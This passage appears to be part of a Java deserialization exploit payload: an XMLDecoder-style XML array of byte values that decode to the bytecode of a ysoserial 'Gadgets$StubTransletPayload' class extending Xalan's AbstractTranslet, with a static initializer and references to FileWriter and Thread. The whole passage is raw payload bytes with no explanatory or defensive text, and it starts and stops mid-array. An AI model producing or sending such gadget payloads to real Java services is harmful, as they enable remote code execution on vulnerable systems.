<void index="773"><byte>97</byte></void>
<void index="774"><byte>108</byte></void>
<void index="775"><byte>97</byte></void>
<void index="776"><byte>110</byte></void>
<void index="777"><byte>47</byte></void>
<void index="778"><byte>105</byte></void>
<void index="779"><byte>110</byte></void>
<void index="780"><byte>116</byte></void>
<void index="781"><byte>101</byte></void>
<void index="782"><byte>114</byte></void>
<void index="783"><byte>110</byte></void>
<void index="784"><byte>97</byte></void>
<void index="785"><byte>108</byte></void>
<void index="786"><byte>47</byte></void>
<void index="787"><byte>120</byte></void>
<void index="788"><byte>115</byte></void>
<void index="789"><byte>108</byte></void>
<void index="790"><byte>116</byte></void>
<void index="791"><byte>99</byte></void>
<void index="792"><byte>47</byte></void>
<void index="793"><byte>68</byte></void>
<void index="794"><byte>79</byte></void>
<void index="795"><byte>77</byte></void>
<void index="796"><byte>59</byte></void>
<void index="797"><byte>1</byte></void>
<void index="798"><byte>0</byte></void>
<void index="799"><byte>8</byte></void>
<void index="800"><byte>104</byte></void>
<void index="801"><byte>97</byte></void>
<void index="802"><byte>110</byte></void>
<void index="803"><byte>100</byte></void>
<void index="804"><byte>108</byte></void>
<void index="805"><byte>101</byte></void>
<void index="806"><byte>114</byte></void>
<void index="807"><byte>115</byte></void>
<void index="808"><byte>1</byte></void>
<void index="809"><byte>0</byte></void>
<void index="810"><byte>66</byte></void>
<void index="811"><byte>91</byte></void>
<void index="812"><byte>76</byte></void>
<void index="813"><byte>99</byte></void>
<void index="814"><byte>111</byte></void>
<void index="815"><byte>109</byte></void>
<void index="816"><byte>47</byte></void>
<void index="817"><byte>115</byte></void>
<void index="818"><byte>117</byte></void>
<void index="819"><byte>110</byte></void>
<void index="820"><byte>47</byte></void>
<void index="821"><byte>111</byte></void>
<void index="822"><byte>114</byte></void>
<void index="823"><byte>103</byte></void>
<void index="824"><byte>47</byte></void>
<void index="825"><byte>97</byte></void>
<void index="826"><byte>112</byte></void>
<void index="827"><byte>97</byte></void>
<void index="828"><byte>99</byte></void>
<void index="829"><byte>104</byte></void>
<void index="830"><byte>101</byte></void>
<void index="831"><byte>47</byte></void>
<void index="832"><byte>120</byte></void>
<void index="833"><byte>109</byte></void>
<void index="834"><byte>108</byte></void>
<void index="835"><byte>47</byte></void>
<void index="836"><byte>105</byte></void>
<void index="837"><byte>110</byte></void>
<void index="838"><byte>116</byte></void>
<void index="839"><byte>101</byte></void>
<void index="840"><byte>114</byte></void>
<void index="841"><byte>110</byte></void>
<void index="842"><byte>97</byte></void>
<void index="843"><byte>108</byte></void>
<void index="844"><byte>47</byte></void>
<void index="845"><byte>115</byte></void>
<void index="846"><byte>101</byte></void>
<void index="847"><byte>114</byte></void>
<void index="848"><byte>105</byte></void>
<void index="849"><byte>97</byte></void>
<void index="850"><byte>108</byte></void>
<void index="851"><byte>105</byte></void>
<void index="852"><byte>122</byte></void>
<void index="853"><byte>101</byte></void>
<void index="854"><byte>114</byte></void>
<void index="855"><byte>47</byte></void>
<void index="856"><byte>83</byte></void>
<void index="857"><byte>101</byte></void>
<void index="858"><byte>114</byte></void>
<void index="859"><byte>105</byte></void>
<void index="860"><byte>97</byte></void>
<void index="861"><byte>108</byte></void>
<void index="862"><byte>105</byte></void>
<void index="863"><byte>122</byte></void>
<void index="864"><byte>97</byte></void>
<void index="865"><byte>116</byte></void>
<void index="866"><byte>105</byte></void>
<void index="867"><byte>111</byte></void>
<void index="868"><byte>110</byte></void>
<void index="869"><byte>72</byte></void>
<void index="870"><byte>97</byte></void>
<void index="871"><byte>110</byte></void>
<void index="872"><byte>100</byte></void>
<void index="873"><byte>108</byte></void>
<void index="874"><byte>101</byte></void>
<void index="875"><byte>114</byte></void>
<void index="876"><byte>59</byte></void>
<void index="877"><byte>1</byte></void>
<void index="878"><byte>0</byte></void>
<void index="879"><byte>10</byte></void>
<void index="880"><byte>69</byte></void>
<void index="881"><byte>120</byte></void>
<void index="882"><byte>99</byte></void>
<void index="883"><byte>101</byte></void>
<void index="884"><byte>112</byte></void>
<void index="885"><byte>116</byte></void>
<void index="886"><byte>105</byte></void>
<void index="887"><byte>111</byte></void>
<void index="888"><byte>110</byte></void>
<void index="889"><byte>115</byte></void>
<void index="890"><byte>7</byte></void>
<void index="891"><byte>0</byte></void>
<void index="892"><byte>39</byte></void>
<void index="893"><byte>1</byte></void>
<void index="894"><byte>0</byte></void>
<void index="895"><byte>-90</byte></void>
<void index="896"><byte>40</byte></void>
<void index="897"><byte>76</byte></void>
<void index="898"><byte>99</byte></void>
<void index="899"><byte>111</byte></void>
<void index="900"><byte>109</byte></void>
<void index="901"><byte>47</byte></void>
<void index="902"><byte>115</byte></void>
<void index="903"><byte>117</byte></void>
<void index="904"><byte>110</byte></void>
<void index="905"><byte>47</byte></void>
<void index="906"><byte>111</byte></void>
<void index="907"><byte>114</byte></void>
<void index="908"><byte>103</byte></void>
<void index="909"><byte>47</byte></void>
<void index="910"><byte>97</byte></void>
<void index="911"><byte>112</byte></void>
<void index="912"><byte>97</byte></void>
<void index="913"><byte>99</byte></void>
<void index="914"><byte>104</byte></void>
<void index="915"><byte>101</byte></void>
<void index="916"><byte>47</byte></void>
<void index="917"><byte>120</byte></void>
<void index="918"><byte>97</byte></void>
<void index="919"><byte>108</byte></void>
<void index="920"><byte>97</byte></void>
<void index="921"><byte>110</byte></void>
<void index="922"><byte>47</byte></void>
<void index="923"><byte>105</byte></void>
<void index="924"><byte>110</byte></void>
<void index="925"><byte>116</byte></void>
<void index="926"><byte>101</byte></void>
<void index="927"><byte>114</byte></void>
<void index="928"><byte>110</byte></void>
<void index="929"><byte>97</byte></void>
<void index="930"><byte>108</byte></void>
<void index="931"><byte>47</byte></void>
<void index="932"><byte>120</byte></void>
<void index="933"><byte>115</byte></void>
<void index="934"><byte>108</byte></void>
<void index="935"><byte>116</byte></void>
<void index="936"><byte>99</byte></void>
<void index="937"><byte>47</byte></void>
<void index="938"><byte>68</byte></void>
<void index="939"><byte>79</byte></void>
<void index="940"><byte>77</byte></void>
<void index="941"><byte>59</byte></void>
<void index="942"><byte>76</byte></void>
<void index="943"><byte>99</byte></void>
<void index="944"><byte>111</byte></void>
<void index="945"><byte>109</byte></void>
<void index="946"><byte>47</byte></void>
<void index="947"><byte>115</byte></void>
<void index="948"><byte>117</byte></void>
<void index="949"><byte>110</byte></void>
<void index="950"><byte>47</byte></void>
<void index="951"><byte>111</byte></void>
<void index="952"><byte>114</byte></void>
<void index="953"><byte>103</byte></void>
<void index="954"><byte>47</byte></void>
<void index="955"><byte>97</byte></void>
<void index="956"><byte>112</byte></void>
<void index="957"><byte>97</byte></void>
<void index="958"><byte>99</byte></void>
<void index="959"><byte>104</byte></void>
<void index="960"><byte>101</byte></void>
<void index="961"><byte>47</byte></void>
<void index="962"><byte>120</byte></void>
<void index="963"><byte>109</byte></void>
<void index="964"><byte>108</byte></void>
<void index="965"><byte>47</byte></void>
<void index="966"><byte>105</byte></void>
<void index="967"><byte>110</byte></void>
<void index="968"><byte>116</byte></void>
<void index="969"><byte>101</byte></void>
<void index="970"><byte>114</byte></void>
<void index="971"><byte>110</byte></void>
<void index="972"><byte>97</byte></void>
<void index="973"><byte>108</byte></void>
<void index="974"><byte>47</byte></void>
<void index="975"><byte>100</byte></void>
<void index="976"><byte>116</byte></void>
<void index="977"><byte>109</byte></void>
<void index="978"><byte>47</byte></void>
<void index="979"><byte>68</byte></void>
<void index="980"><byte>84</byte></void>
<void index="981"><byte>77</byte></void>
<void index="982"><byte>65</byte></void>
<void index="983"><byte>120</byte></void>
<void index="984"><byte>105</byte></void>
<void index="985"><byte>115</byte></void>
<void index="986"><byte>73</byte></void>
<void index="987"><byte>116</byte></void>
<void index="988"><byte>101</byte></void>
<void index="989"><byte>114</byte></void>
<void index="990"><byte>97</byte></void>
<void index="991"><byte>116</byte></void>
<void index="992"><byte>111</byte></void>
<void index="993"><byte>114</byte></void>
<void index="994"><byte>59</byte></void>
<void index="995"><byte>76</byte></void>
<void index="996"><byte>99</byte></void>
<void index="997"><byte>111</byte></void>
<void index="998"><byte>109</byte></void>
<void index="999"><byte>47</byte></void>
<void index="1000"><byte>115</byte></void>
<void index="1001"><byte>117</byte></void>
<void index="1002"><byte>110</byte></void>
<void index="1003"><byte>47</byte></void>
<void index="1004"><byte>111</byte></void>
<void index="1005"><byte>114</byte></void>
<void index="1006"><byte>103</byte></void>
<void index="1007"><byte>47</byte></void>
<void index="1008"><byte>97</byte></void>
<void index="1009"><byte>112</byte></void>
<void index="1010"><byte>97</byte></void>
<void index="1011"><byte>99</byte></void>
<void index="1012"><byte>104</byte></void>
<void index="1013"><byte>101</byte></void>
<void index="1014"><byte>47</byte></void>
<void index="1015"><byte>120</byte></void>
<void index="1016"><byte>109</byte></void>
<void index="1017"><byte>108</byte></void>
<void index="1018"><byte>47</byte></void>
<void index="1019"><byte>105</byte></void>
<void index="1020"><byte>110</byte></void>
<void index="1021"><byte>116</byte></void>
<void index="1022"><byte>101</byte></void>
<void index="1023"><byte>114</byte></void>
<void index="1024"><byte>110</byte></void>
<void index="1025"><byte>97</byte></void>
<void index="1026"><byte>108</byte></void>
<void index="1027"><byte>47</byte></void>
<void index="1028"><byte>115</byte></void>
<void index="1029"><byte>101</byte></void>
<void index="1030"><byte>114</byte></void>
<void index="1031"><byte>105</byte></void>
<void index="1032"><byte>97</byte></void>
<void index="1033"><byte>108</byte></void>
<void index="1034"><byte>105</byte></void>
<void index="1035"><byte>122</byte></void>
<void index="1036"><byte>101</byte></void>
<void index="1037"><byte>114</byte></void>
<void index="1038"><byte>47</byte></void>
<void index="1039"><byte>83</byte></void>
<void index="1040"><byte>101</byte></void>
<void index="1041"><byte>114</byte></void>
<void index="1042"><byte>105</byte></void>
<void index="1043"><byte>97</byte></void>
<void index="1044"><byte>108</byte></void>
<void index="1045"><byte>105</byte></void>
<void index="1046"><byte>122</byte></void>
<void index="1047"><byte>97</byte></void>
<void index="1048"><byte>116</byte></void>
<void index="1049"><byte>105</byte></void>
<void index="1050"><byte>111</byte></void>
<void index="1051"><byte>110</byte></void>
<void index="1052"><byte>72</byte></void>
<void index="1053"><byte>97</byte></void>
<void index="1054"><byte>110</byte></void>
<void index="1055"><byte>100</byte></void>
<void index="1056"><byte>108</byte></void>
<void index="1057"><byte>101</byte></void>
<void index="1058"><byte>114</byte></void>
<void index="1059"><byte>59</byte></void>
<void index="1060"><byte>41</byte></void>
<void index="1061"><byte>86</byte></void>
<void index="1062"><byte>1</byte></void>
<void index="1063"><byte>0</byte></void>
<void index="1064"><byte>8</byte></void>
<void index="1065"><byte>105</byte></void>
<void index="1066"><byte>116</byte></void>
<void index="1067"><byte>101</byte></void>
<void index="1068"><byte>114</byte></void>
<void index="1069"><byte>97</byte></void>
<void index="1070"><byte>116</byte></void>
<void index="1071"><byte>111</byte></void>
<void index="1072"><byte>114</byte></void>
<void index="1073"><byte>1</byte></void>
<void index="1074"><byte>0</byte></void>
<void index="1075"><byte>53</byte></void>
<void index="1076"><byte>76</byte></void>
<void index="1077"><byte>99</byte></void>
<void index="1078"><byte>111</byte></void>
<void index="1079"><byte>109</byte></void>
<void index="1080"><byte>47</byte></void>
<void index="1081"><byte>115</byte></void>
<void index="1082"><byte>117</byte></void>
<void index="1083"><byte>110</byte></void>
<void index="1084"><byte>47</byte></void>
<void index="1085"><byte>111</byte></void>
<void index="1086"><byte>114</byte></void>
<void index="1087"><byte>103</byte></void>
<void index="1088"><byte>47</byte></void>
<void index="1089"><byte>97</byte></void>
<void index="1090"><byte>112</byte></void>
<void index="1091"><byte>97</byte></void>
<void index="1092"><byte>99</byte></void>
<void index="1093"><byte>104</byte></void>
<void index="1094"><byte>101</byte></void>
<void index="1095"><byte>47</byte></void>
<void index="1096"><byte>120</byte></void>
<void index="1097"><byte>109</byte></void>
<void index="1098"><byte>108</byte></void>
<void index="1099"><byte>47</byte></void>
<void index="1100"><byte>105</byte></void>
<void index="1101"><byte>110</byte></void>
<void index="1102"><byte>116</byte></void>
<void index="1103"><byte>101</byte></void>
<void index="1104"><byte>114</byte></void>
<void index="1105"><byte>110</byte></void>
<void index="1106"><byte>97</byte></void>
<void index="1107"><byte>108</byte></void>
<void index="1108"><byte>47</byte></void>
<void index="1109"><byte>100</byte></void>
<void index="1110"><byte>116</byte></void>
<void index="1111"><byte>109</byte></void>
<void index="1112"><byte>47</byte></void>
<void index="1113"><byte>68</byte></void>
<void index="1114"><byte>84</byte></void>
<void index="1115"><byte>77</byte></void>
<void index="1116"><byte>65</byte></void>
<void index="1117"><byte>120</byte></void>
<void index="1118"><byte>105</byte></void>
<void index="1119"><byte>115</byte></void>
<void index="1120"><byte>73</byte></void>
<void index="1121"><byte>116</byte></void>
<void index="1122"><byte>101</byte></void>
<void index="1123"><byte>114</byte></void>
<void index="1124"><byte>97</byte></void>
<void index="1125"><byte>116</byte></void>
<void index="1126"><byte>111</byte></void>
<void index="1127"><byte>114</byte></void>
<void index="1128"><byte>59</byte></void>
<void index="1129"><byte>1</byte></void>
<void index="1130"><byte>0</byte></void>
<void index="1131"><byte>7</byte></void>
<void index="1132"><byte>104</byte></void>
<void index="1133"><byte>97</byte></void>
<void index="1134"><byte>110</byte></void>
<void index="1135"><byte>100</byte></void>
<void index="1136"><byte>108</byte></void>
<void index="1137"><byte>101</byte></void>
<void index="1138"><byte>114</byte></void>
<void index="1139"><byte>1</byte></void>
<void index="1140"><byte>0</byte></void>
<void index="1141"><byte>65</byte></void>
<void index="1142"><byte>76</byte></void>
<void index="1143"><byte>99</byte></void>
<void index="1144"><byte>111</byte></void>
<void index="1145"><byte>109</byte></void>
<void index="1146"><byte>47</byte></void>
<void index="1147"><byte>115</byte></void>
<void index="1148"><byte>117</byte></void>
<void index="1149"><byte>110</byte></void>
<void index="1150"><byte>47</byte></void>
<void index="1151"><byte>111</byte></void>
<void index="1152"><byte>114</byte></void>
<void index="1153"><byte>103</byte></void>
<void index="1154"><byte>47</byte></void>
<void index="1155"><byte>97</byte></void>
<void index="1156"><byte>112</byte></void>
<void index="1157"><byte>97</byte></void>
<void index="1158"><byte>99</byte></void>
<void index="1159"><byte>104</byte></void>
<void index="1160"><byte>101</byte></void>
<void index="1161"><byte>47</byte></void>
<void index="1162"><byte>120</byte></void>
<void index="1163"><byte>109</byte></void>
<void index="1164"><byte>108</byte></void>
<void index="1165"><byte>47</byte></void>
<void index="1166"><byte>105</byte></void>
<void index="1167"><byte>110</byte></void>
<void index="1168"><byte>116</byte></void>
<void index="1169"><byte>101</byte></void>
<void index="1170"><byte>114</byte></void>
<void index="1171"><byte>110</byte></void>
<void index="1172"><byte>97</byte></void>
<void index="1173"><byte>108</byte></void>
<void index="1174"><byte>47</byte></void>
<void index="1175"><byte>115</byte></void>
<void index="1176"><byte>101</byte></void>
<void index="1177"><byte>114</byte></void>
<void index="1178"><byte>105</byte></void>
<void index="1179"><byte>97</byte></void>
<void index="1180"><byte>108</byte></void>
<void index="1181"><byte>105</byte></void>
<void index="1182"><byte>122</byte></void>
<void index="1183"><byte>101</byte></void>
<void index="1184"><byte>114</byte></void>
<void index="1185"><byte>47</byte></void>
<void index="1186"><byte>83</byte></void>
<void index="1187"><byte>101</byte></void>
<void index="1188"><byte>114</byte></void>
<void index="1189"><byte>105</byte></void>
<void index="1190"><byte>97</byte></void>
<void index="1191"><byte>108</byte></void>
<void index="1192"><byte>105</byte></void>
<void index="1193"><byte>122</byte></void>
<void index="1194"><byte>97</byte></void>
<void index="1195"><byte>116</byte></void>
<void index="1196"><byte>105</byte></void>
<void index="1197"><byte>111</byte></void>
<void index="1198"><byte>110</byte></void>
<void index="1199"><byte>72</byte></void>
<void index="1200"><byte>97</byte></void>
<void index="1201"><byte>110</byte></void>
<void index="1202"><byte>100</byte></void>
<void index="1203"><byte>108</byte></void>
<void index="1204"><byte>101</byte></void>
<void index="1205"><byte>114</byte></void>
<void index="1206"><byte>59</byte></void>
<void index="1207"><byte>1</byte></void>
<void index="1208"><byte>0</byte></void>
<void index="1209"><byte>10</byte></void>
<void index="1210"><byte>83</byte></void>
<void index="1211"><byte>111</byte></void>
<void index="1212"><byte>117</byte></void>
<void index="1213"><byte>114</byte></void>
<void index="1214"><byte>99</byte></void>
<void index="1215"><byte>101</byte></void>
<void index="1216"><byte>70</byte></void>
<void index="1217"><byte>105</byte></void>
<void index="1218"><byte>108</byte></void>
<void index="1219"><byte>101</byte></void>
<void index="1220"><byte>1</byte></void>
<void index="1221"><byte>0</byte></void>
<void index="1222"><byte>12</byte></void>
<void index="1223"><byte>71</byte></void>
<void index="1224"><byte>97</byte></void>
<void index="1225"><byte>100</byte></void>
<void index="1226"><byte>103</byte></void>
<void index="1227"><byte>101</byte></void>
<void index="1228"><byte>116</byte></void>
<void index="1229"><byte>115</byte></void>
<void index="1230"><byte>46</byte></void>
<void index="1231"><byte>106</byte></void>
<void index="1232"><byte>97</byte></void>
<void index="1233"><byte>118</byte></void>
<void index="1234"><byte>97</byte></void>
<void index="1235"><byte>12</byte></void>
<void index="1236"><byte>0</byte></void>
<void index="1237"><byte>10</byte></void>
<void index="1238"><byte>0</byte></void>
<void index="1239"><byte>11</byte></void>
<void index="1240"><byte>7</byte></void>
<void index="1241"><byte>0</byte></void>
<void index="1242"><byte>40</byte></void>
<void index="1243"><byte>1</byte></void>
<void index="1244"><byte>0</byte></void>
<void index="1245"><byte>51</byte></void>
<void index="1246"><byte>121</byte></void>
<void index="1247"><byte>115</byte></void>
<void index="1248"><byte>111</byte></void>
<void index="1249"><byte>115</byte></void>
<void index="1250"><byte>101</byte></void>
<void index="1251"><byte>114</byte></void>
<void index="1252"><byte>105</byte></void>
<void index="1253"><byte>97</byte></void>
<void index="1254"><byte>108</byte></void>
<void index="1255"><byte>47</byte></void>
<void index="1256"><byte>112</byte></void>
<void index="1257"><byte>97</byte></void>
<void index="1258"><byte>121</byte></void>
<void index="1259"><byte>108</byte></void>
<void index="1260"><byte>111</byte></void>
<void index="1261"><byte>97</byte></void>
<void index="1262"><byte>100</byte></void>
<void index="1263"><byte>115</byte></void>
<void index="1264"><byte>47</byte></void>
<void index="1265"><byte>117</byte></void>
<void index="1266"><byte>116</byte></void>
<void index="1267"><byte>105</byte></void>
<void index="1268"><byte>108</byte></void>
<void index="1269"><byte>47</byte></void>
<void index="1270"><byte>71</byte></void>
<void index="1271"><byte>97</byte></void>
<void index="1272"><byte>100</byte></void>
<void index="1273"><byte>103</byte></void>
<void index="1274"><byte>101</byte></void>
<void index="1275"><byte>116</byte></void>
<void index="1276"><byte>115</byte></void>
<void index="1277"><byte>36</byte></void>
<void index="1278"><byte>83</byte></void>
<void index="1279"><byte>116</byte></void>
<void index="1280"><byte>117</byte></void>
<void index="1281"><byte>98</byte></void>
<void index="1282"><byte>84</byte></void>
<void index="1283"><byte>114</byte></void>
<void index="1284"><byte>97</byte></void>
<void index="1285"><byte>110</byte></void>
<void index="1286"><byte>115</byte></void>
<void index="1287"><byte>108</byte></void>
<void index="1288"><byte>101</byte></void>
<void index="1289"><byte>116</byte></void>
<void index="1290"><byte>80</byte></void>
<void index="1291"><byte>97</byte></void>
<void index="1292"><byte>121</byte></void>
<void index="1293"><byte>108</byte></void>
<void index="1294"><byte>111</byte></void>
<void index="1295"><byte>97</byte></void>
<void index="1296"><byte>100</byte></void>
<void index="1297"><byte>1</byte></void>
<void index="1298"><byte>0</byte></void>
<void index="1299"><byte>64</byte></void>
<void index="1300"><byte>99</byte></void>
<void index="1301"><byte>111</byte></void>
<void index="1302"><byte>109</byte></void>
<void index="1303"><byte>47</byte></void>
<void index="1304"><byte>115</byte></void>
<void index="1305"><byte>117</byte></void>
<void index="1306"><byte>110</byte></void>
<void index="1307"><byte>47</byte></void>
<void index="1308"><byte>111</byte></void>
<void index="1309"><byte>114</byte></void>
<void index="1310"><byte>103</byte></void>
<void index="1311"><byte>47</byte></void>
<void index="1312"><byte>97</byte></void>
<void index="1313"><byte>112</byte></void>
<void index="1314"><byte>97</byte></void>
<void index="1315"><byte>99</byte></void>
<void index="1316"><byte>104</byte></void>
<void index="1317"><byte>101</byte></void>
<void index="1318"><byte>47</byte></void>
<void index="1319"><byte>120</byte></void>
<void index="1320"><byte>97</byte></void>
<void index="1321"><byte>108</byte></void>
<void index="1322"><byte>97</byte></void>
<void index="1323"><byte>110</byte></void>
<void index="1324"><byte>47</byte></void>
<void index="1325"><byte>105</byte></void>
<void index="1326"><byte>110</byte></void>
<void index="1327"><byte>116</byte></void>
<void index="1328"><byte>101</byte></void>
<void index="1329"><byte>114</byte></void>
<void index="1330"><byte>110</byte></void>
<void index="1331"><byte>97</byte></void>
<void index="1332"><byte>108</byte></void>
<void index="1333"><byte>47</byte></void>
<void index="1334"><byte>120</byte></void>
<void index="1335"><byte>115</byte></void>
<void index="1336"><byte>108</byte></void>
<void index="1337"><byte>116</byte></void>
<void index="1338"><byte>99</byte></void>
<void index="1339"><byte>47</byte></void>
<void index="1340"><byte>114</byte></void>
<void index="1341"><byte>117</byte></void>
<void index="1342"><byte>110</byte></void>
<void index="1343"><byte>116</byte></void>
<void index="1344"><byte>105</byte></void>
<void index="1345"><byte>109</byte></void>
<void index="1346"><byte>101</byte></void>
<void index="1347"><byte>47</byte></void>
<void index="1348"><byte>65</byte></void>
<void index="1349"><byte>98</byte></void>
<void index="1350"><byte>115</byte></void>
<void index="1351"><byte>116</byte></void>
<void index="1352"><byte>114</byte></void>
<void index="1353"><byte>97</byte></void>
<void index="1354"><byte>99</byte></void>
<void index="1355"><byte>116</byte></void>
<void index="1356"><byte>84</byte></void>
<void index="1357"><byte>114</byte></void>
<void index="1358"><byte>97</byte></void>
<void index="1359"><byte>110</byte></void>
<void index="1360"><byte>115</byte></void>
<void index="1361"><byte>108</byte></void>
<void index="1362"><byte>101</byte></void>
<void index="1363"><byte>116</byte></void>
<void index="1364"><byte>1</byte></void>
<void index="1365"><byte>0</byte></void>
<void index="1366"><byte>20</byte></void>
<void index="1367"><byte>106</byte></void>
<void index="1368"><byte>97</byte></void>
<void index="1369"><byte>118</byte></void>
<void index="1370"><byte>97</byte></void>
<void index="1371"><byte>47</byte></void>
<void index="1372"><byte>105</byte></void>
<void index="1373"><byte>111</byte></void>
<void index="1374"><byte>47</byte></void>
<void index="1375"><byte>83</byte></void>
<void index="1376"><byte>101</byte></void>
<void index="1377"><byte>114</byte></void>
<void index="1378"><byte>105</byte></void>
<void index="1379"><byte>97</byte></void>
<void index="1380"><byte>108</byte></void>
<void index="1381"><byte>105</byte></void>
<void index="1382"><byte>122</byte></void>
<void index="1383"><byte>97</byte></void>
<void index="1384"><byte>98</byte></void>
<void index="1385"><byte>108</byte></void>
<void index="1386"><byte>101</byte></void>
<void index="1387"><byte>1</byte></void>
<void index="1388"><byte>0</byte></void>
<void index="1389"><byte>57</byte></void>
<void index="1390"><byte>99</byte></void>
<void index="1391"><byte>111</byte></void>
<void index="1392"><byte>109</byte></void>
<void index="1393"><byte>47</byte></void>
<void index="1394"><byte>115</byte></void>
<void index="1395"><byte>117</byte></void>
<void index="1396"><byte>110</byte></void>
<void index="1397"><byte>47</byte></void>
<void index="1398"><byte>111</byte></void>
<void index="1399"><byte>114</byte></void>
<void index="1400"><byte>103</byte></void>
<void index="1401"><byte>47</byte></void>
<void index="1402"><byte>97</byte></void>
<void index="1403"><byte>112</byte></void>
<void index="1404"><byte>97</byte></void>
<void index="1405"><byte>99</byte></void>
<void index="1406"><byte>104</byte></void>
<void index="1407"><byte>101</byte></void>
<void index="1408"><byte>47</byte></void>
<void index="1409"><byte>120</byte></void>
<void index="1410"><byte>97</byte></void>
<void index="1411"><byte>108</byte></void>
<void index="1412"><byte>97</byte></void>
<void index="1413"><byte>110</byte></void>
<void index="1414"><byte>47</byte></void>
<void index="1415"><byte>105</byte></void>
<void index="1416"><byte>110</byte></void>
<void index="1417"><byte>116</byte></void>
<void index="1418"><byte>101</byte></void>
<void index="1419"><byte>114</byte></void>
<void index="1420"><byte>110</byte></void>
<void index="1421"><byte>97</byte></void>
<void index="1422"><byte>108</byte></void>
<void index="1423"><byte>47</byte></void>
<void index="1424"><byte>120</byte></void>
<void index="1425"><byte>115</byte></void>
<void index="1426"><byte>108</byte></void>
<void index="1427"><byte>116</byte></void>
<void index="1428"><byte>99</byte></void>
<void index="1429"><byte>47</byte></void>
<void index="1430"><byte>84</byte></void>
<void index="1431"><byte>114</byte></void>
<void index="1432"><byte>97</byte></void>
<void index="1433"><byte>110</byte></void>
<void index="1434"><byte>115</byte></void>
<void index="1435"><byte>108</byte></void>
<void index="1436"><byte>101</byte></void>
<void index="1437"><byte>116</byte></void>
<void index="1438"><byte>69</byte></void>
<void index="1439"><byte>120</byte></void>
<void index="1440"><byte>99</byte></void>
<void index="1441"><byte>101</byte></void>
<void index="1442"><byte>112</byte></void>
<void index="1443"><byte>116</byte></void>
<void index="1444"><byte>105</byte></void>
<void index="1445"><byte>111</byte></void>
<void index="1446"><byte>110</byte></void>
<void index="1447"><byte>1</byte></void>
<void index="1448"><byte>0</byte></void>
<void index="1449"><byte>31</byte></void>
<void index="1450"><byte>121</byte></void>
<void index="1451"><byte>115</byte></void>
<void index="1452"><byte>111</byte></void>
<void index="1453"><byte>115</byte></void>
<void index="1454"><byte>101</byte></void>
<void index="1455"><byte>114</byte></void>
<void index="1456"><byte>105</byte></void>
<void index="1457"><byte>97</byte></void>
<void index="1458"><byte>108</byte></void>
<void index="1459"><byte>47</byte></void>
<void index="1460"><byte>112</byte></void>
<void index="1461"><byte>97</byte></void>
<void index="1462"><byte>121</byte></void>
<void index="1463"><byte>108</byte></void>
<void index="1464"><byte>111</byte></void>
<void index="1465"><byte>97</byte></void>
<void index="1466"><byte>100</byte></void>
<void index="1467"><byte>115</byte></void>
<void index="1468"><byte>47</byte></void>
<void index="1469"><byte>117</byte></void>
<void index="1470"><byte>116</byte></void>
<void index="1471"><byte>105</byte></void>
<void index="1472"><byte>108</byte></void>
<void index="1473"><byte>47</byte></void>
<void index="1474"><byte>71</byte></void>
<void index="1475"><byte>97</byte></void>
<void index="1476"><byte>100</byte></void>
<void index="1477"><byte>103</byte></void>
<void index="1478"><byte>101</byte></void>
<void index="1479"><byte>116</byte></void>
<void index="1480"><byte>115</byte></void>
<void index="1481"><byte>1</byte></void>
<void index="1482"><byte>0</byte></void>
<void index="1483"><byte>8</byte></void>
<void index="1484"><byte>60</byte></void>
<void index="1485"><byte>99</byte></void>
<void index="1486"><byte>108</byte></void>
<void index="1487"><byte>105</byte></void>
<void index="1488"><byte>110</byte></void>
<void index="1489"><byte>105</byte></void>
<void index="1490"><byte>116</byte></void>
<void index="1491"><byte>62</byte></void>
<void index="1492"><byte>1</byte></void>
<void index="1493"><byte>0</byte></void>
<void index="1494"><byte>18</byte></void>
<void index="1495"><byte>106</byte></void>
<void index="1496"><byte>97</byte></void>
<void index="1497"><byte>118</byte></void>
<void index="1498"><byte>97</byte></void>
<void index="1499"><byte>47</byte></void>
<void index="1500"><byte>105</byte></void>
<void index="1501"><byte>111</byte></void>
<void index="1502"><byte>47</byte></void>
<void index="1503"><byte>70</byte></void>
<void index="1504"><byte>105</byte></void>
<void index="1505"><byte>108</byte></void>
<void index="1506"><byte>101</byte></void>
<void index="1507"><byte>87</byte></void>
<void index="1508"><byte>114</byte></void>
<void index="1509"><byte>105</byte></void>
<void index="1510"><byte>116</byte></void>
<void index="1511"><byte>101</byte></void>
<void index="1512"><byte>114</byte></void>
<void index="1513"><byte>7</byte></void>
<void index="1514"><byte>0</byte></void>
<void index="1515"><byte>42</byte></void>
<void index="1516"><byte>1</byte></void>
<void index="1517"><byte>0</byte></void>
<void index="1518"><byte>22</byte></void>
<void index="1519"><byte>106</byte></void>
<void index="1520"><byte>97</byte></void>
<void index="1521"><byte>118</byte></void>
<void index="1522"><byte>97</byte></void>
<void index="1523"><byte>47</byte></void>
<void index="1524"><byte>108</byte></void>
<void index="1525"><byte>97</byte></void>
<void index="1526"><byte>110</byte></void>
<void index="1527"><byte>103</byte></void>
<void index="1528"><byte>47</byte></void>
<void index="1529"><byte>83</byte></void>
<void index="1530"><byte>116</byte></void>
<void index="1531"><byte>114</byte></void>
<void index="1532"><byte>105</byte></void>
<void index="1533"><byte>110</byte></void>
<void index="1534"><byte>103</byte></void>
<void index="1535"><byte>66</byte></void>
<void index="1536"><byte>117</byte></void>
<void index="1537"><byte>102</byte></void>
<void index="1538"><byte>102</byte></void>
<void index="1539"><byte>101</byte></void>
<void index="1540"><byte>114</byte></void>
<void index="1541"><byte>7</byte></void>
<void index="1542"><byte>0</byte></void>
<void index="1543"><byte>44</byte></void>
<void index="1544"><byte>10</byte></void>
<void index="1545"><byte>0</byte></void>
<void index="1546"><byte>45</byte></void>
<void index="1547"><byte>0</byte></void>
<void index="1548"><byte>34</byte></void>
<void index="1549"><byte>1</byte></void>
<void index="1550"><byte>0</byte></void>
<void index="1551"><byte>16</byte></void>
<void index="1552"><byte>106</byte></void>
<void index="1553"><byte>97</byte></void>
<void index="1554"><byte>118</byte></void>
<void index="1555"><byte>97</byte></void>
<void index="1556"><byte>47</byte></void>
<void index="1557"><byte>108</byte></void>
<void index="1558"><byte>97</byte></void>
<void index="1559"><byte>110</byte></void>
<void index="1560"><byte>103</byte></void>
<void index="1561"><byte>47</byte></void>
<void index="1562"><byte>84</byte></void>
<void index="1563"><byte>104</byte></void>
<void index="1564"><byte>114</byte></void>
<void index="1565"><byte>101</byte></void>
<void index="1566"><byte>97</byte></void>
<void index="1567"><byte>100</byte></void>
<void index="1568"><byte>7</byte></void>
<void index="1569"><byte>0</byte></void>
<void index="1570"><byte>47</byte></void>
<void index="1571"><byte>1</byte></void>
<void index="1572"><byte>0</byte></void>
<void index="1573"><byte>13</byte></void>
